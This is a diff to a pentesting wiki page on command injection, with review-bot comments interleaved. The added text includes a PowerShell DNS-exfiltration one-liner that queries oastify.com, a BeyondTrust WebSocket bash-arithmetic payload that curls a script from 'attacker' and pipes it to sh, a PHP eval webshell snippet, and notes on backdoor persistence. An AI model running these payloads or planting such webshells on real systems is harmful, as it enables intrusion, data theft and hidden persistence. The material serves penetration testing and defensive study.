21 changes: 21 additions & 0 deletions src/pentesting-web/command-injection.md
@@ -116,6 +116,12 @@ Online tools to check for DNS based data exfiltration:
- dnsbin.zhack.ca
- pingb.in

When egress is filtered, **hex-encode short IDs into DNS labels** (≤63 bytes per label). Example PowerShell one-liner that encodes the hostname and queries an OAST domain:

```powershell
$h=[System.BitConverter]::ToString([Text.Encoding]::UTF8.GetBytes($env:COMPUTERNAME)).Replace('-','');$labels=($h -split '(.{1,63})' | ? {$_});$d=($labels -join ".")+".oastify.com";nslookup $d
```

### Filtering bypass

#### Windows
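Review bot: the one-liner hardcodes `oastify.com`, which is the shared Burp Collaborator base domain rather than a host the reader controls, so as written the query goes to a domain whose resolver logs the tester cannot read; replace it with a placeholder such as `<your-oast-domain>` and say in the sentence above that it must be substituted. The same paragraph should carry two caveats the code implies but does not state: the 63-byte limit is per label, but a full name is also capped at 253 bytes, and the hex encoding doubles the input size, so this only fits short identifiers; and "When egress is filtered" reads as if DNS were blocked too, so rephrase to "when only DNS is allowed out". From the defensive side it is worth one line noting that long, hex-only multi-label names sent to an OAST domain are exactly what a resolver-log detection for this technique keys on.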
@@ -206,6 +212,20 @@ Example payloads:

Because these diagnostics are parsed by the JVM itself, no shell metacharacters are required and the command runs with the same integrity level as the launcher. Desktop IPC bugs that forward user-supplied JVM flags (see [Localhost WebSocket abuse](websocket-attacks.md#localhost-websocket-abuse--browser-port-discovery)) therefore translate directly into OS command execution.

### Bash arithmetic evaluation via WebSocket handshake parameters

Some WebSocket daemons parse client "version" fields (e.g., `remoteVersion` in **BeyondTrust thin-scc-wrapper**) with bash arithmetic `(( ... ))`/`let`. Bash expands command substitutions inside operands, so attacker-controlled values can execute **during the handshake** without auth.

- **Primitive:** use a non-numeric operand with command substitution, e.g., `remoteVersion=a[$(id)]0` or `a[$(curl attacker/p.sh|sh)]0`; `$(...)` runs before the numeric compare.
- **Delivery:** connect to the WS endpoint (e.g., `/nw` or `get_portal_info`) and send the crafted `remoteVersion`; the wrapper executes it as the service user.
- **Validation bypass:** superficial “numeric only” checks still reach bash arithmetic unless strict integer parsing rejects expressions first.

#### Post-exploitation patterns observed after thin-scc-wrapper RCE

- **Ephemeral admin hash swap:** backup the admin DB hash, generate a known-password hash with the appliance hasher (e.g., `check_auth`), swap it briefly to login, then restore and delete helpers.
- **Webshells with gated params and parseable output:** minimal guards like `if(isset($_GET['aaaa'])) eval($_POST['1']);`; multi-source shells read POST/GET/Cookie, `base64_decode` input, `eval()`, and wrap output with `echo "DQo="` before/after for China Chopper/AntSword parsing.
- **Apache config STOMP persistence:** drop a password-protected backdoor (e.g., `file_save.php` checking `?vjwr=`), append a `Location` routing it to a chosen PHP-FPM socket (e.g., `/ns/tmp/php-fpm.sock`), restart Apache, then overwrite the config with the clean backup so disk artifacts look benign.

## PaperCut NG/MF SetupCompleted auth bypass -> print scripting RCE

- Vulnerable NG/MF builds (e.g., 22.0.5 Build 63914) expose `/app?service=page/SetupCompleted`; browsing there and clicking **Login** returns a valid `JSESSIONID` without credentials (authentication bypass in the setup flow).
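Review bot: the `### Bash arithmetic evaluation` section names the product but never cites the advisory it describes; the Unit 42 reference added at the end of this PR carries the identifier (CVE-2026-1731), so link it from the heading or the first bullet so readers can map the behaviour to a fixed version. The `Validation bypass` bullet is also the only place the mitigation is implied; state it plainly as its own sentence (reject any value that is not a strict integer before it reaches `((`/`let`), since that is what a maintainer reading this page needs. Smaller points in the same hunk: the `#### Post-exploitation patterns observed` heading should say where they were observed (same report); `login` in the first bullet under it is a verb and should be `log in`; and the new `## PaperCut NG/MF ...` heading sits one level above the sibling `###` sections and spells the arrow `->` where the references entry for the same section uses `→`, so pick one form.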
@@ -240,5 +260,6 @@ https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/command_injection.txt
- [When WebSockets Lead to RCE in CurseForge](https://elliott.diy/blog/curseforge/)
- [PaperCut NG/MF SetupCompleted auth bypass → print scripting RCE](https://0xdf.gitlab.io/2026/02/03/htb-bamboo.html)
- [CVE-2023-27350.py (auth bypass + print scripting automation)](https://github.com/horizon3ai/CVE-2023-27350/blob/main/CVE-2023-27350.py)
- [Unit 42 – VShell and SparkRAT Observed in Exploitation of BeyondTrust Critical Vulnerability (CVE-2026-1731)](https://unit42.paloaltonetworks.com/beyondtrust-cve-2026-1731/)

{{#include ../banners/hacktricks-training.md}}
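Review bot: the added Unit 42 entry is the only source backing the BeyondTrust section, but it lands after the two PaperCut references while the BeyondTrust section precedes the PaperCut section in the body; move it up so reference order follows section order, and consider trimming the list title to the report name plus the CVE so the entry is scannable alongside the others.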